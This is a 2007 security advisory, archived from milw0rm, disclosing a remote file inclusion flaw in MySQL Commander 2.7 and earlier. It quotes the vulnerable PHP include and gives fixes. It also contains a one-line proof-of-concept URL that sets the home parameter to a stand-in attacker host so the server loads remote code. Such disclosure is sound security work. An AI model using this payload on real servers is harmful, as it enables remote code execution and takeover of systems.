477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
93 lines
3.5 KiB
Text
Executable file
93 lines
3.5 KiB
Text
Executable file
____________________ ___ ___ ________
|
|
\_ _____/\_ ___ \ / | \\_____ \
|
|
| __)_ / \ \// ~ \/ | \
|
|
| \\ \___\ Y / | \
|
|
/_______ / \______ /\___|_ /\_______ /
|
|
\/ \/ \/ \/
|
|
|
|
.OR.ID
|
|
ECHO_ADV_73$2007
|
|
|
|
-----------------------------------------------------------------------------------------
|
|
[ECHO_ADV_73$2007] MySQL Commander <= 2.7 (home) Remote File Inclusion Vulnerability
|
|
-----------------------------------------------------------------------------------------
|
|
|
|
Author : M.Hasran Addahroni
|
|
Date : March, 13th 2007
|
|
Location : Australia, Sydney
|
|
Web : http://advisories.echo.or.id/adv/adv73-K-159-2007.txt
|
|
Critical Lvl : Dangerous
|
|
Impact : System access
|
|
Where : From Remote
|
|
---------------------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
Application : MySQL Commander
|
|
version : <= 2.7
|
|
Vendor : http://www.bitesser.de/freeware/script.php?id=1
|
|
Description :
|
|
|
|
A small tool to backup and restore MySQL Tables. Features: backup/restore of binaries; parametric backup; multiserver; Gzipping; killing of backup files; german/english; Online help in popup.
|
|
This tool makes backups of all the tables in a database. The data will be stored in textfiles located in the "data"directory. You can backup and restore the "SQL create table command" and the "content". So you can easily make copies of your tables. (i.e. copy a hole database with a few clicks).
|
|
You will need PHP since version 4.1 and MySQL since Version 3.23
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
Vulnerability:
|
|
~~~~~~~~~~~~~
|
|
- Invalid include function at ressourcen/dbopen.php :
|
|
|
|
----------------ressourcen/dbopen.php-------------------
|
|
<?php
|
|
include $home."ressourcen/class.systemObject.php";
|
|
include $home."ressourcen/class.DatabaseMysql.php";
|
|
$db = new DatabaseMysql($config->dbuser[$_SESSION['which_db']], $config->dbpass[$_SESSION['which_db']], $config->dbserver[$_SESSION['which_db']]);
|
|
$ok = $db->init();
|
|
|
|
if (!$ok and $db->error and (strlen($config->dbserver[1]) > 0)) {
|
|
echo $db->getError();
|
|
}
|
|
|
|
?>
|
|
----------------------------------------------------------------
|
|
|
|
|
|
Variables $home is not properly sanitized.
|
|
When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.
|
|
|
|
|
|
Poc/Exploit:
|
|
~~~~~~~~~
|
|
|
|
http://www.target.com/[mysqlcommander_path]/ressourcen/dbopen.php?home=http://attacker.com/evil?
|
|
|
|
|
|
Solution:
|
|
~~~~~~
|
|
|
|
- Sanitize variable $home on affected file.
|
|
- Turn off register_globals
|
|
|
|
---------------------------------------------------------------------------
|
|
|
|
Shoutz:
|
|
~~~~
|
|
~ ping - my dearest wife, and my little son, for all the luv the tears n the breath
|
|
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
|
|
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
|
|
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
|
|
~ newbie_hacker@yahoogroups.com
|
|
~ #aikmel #e-c-h-o @irc.dal.net
|
|
|
|
---------------------------------------------------------------------------
|
|
Contact:
|
|
~~~~~
|
|
|
|
K-159 || echo|staff || eufrato[at]gmail[dot]com
|
|
Homepage: http://k-159.echo.or.id/
|
|
|
|
-------------------------------- [ EOF ] ----------------------------------
|
|
|
|
# milw0rm.com [2007-03-13]
|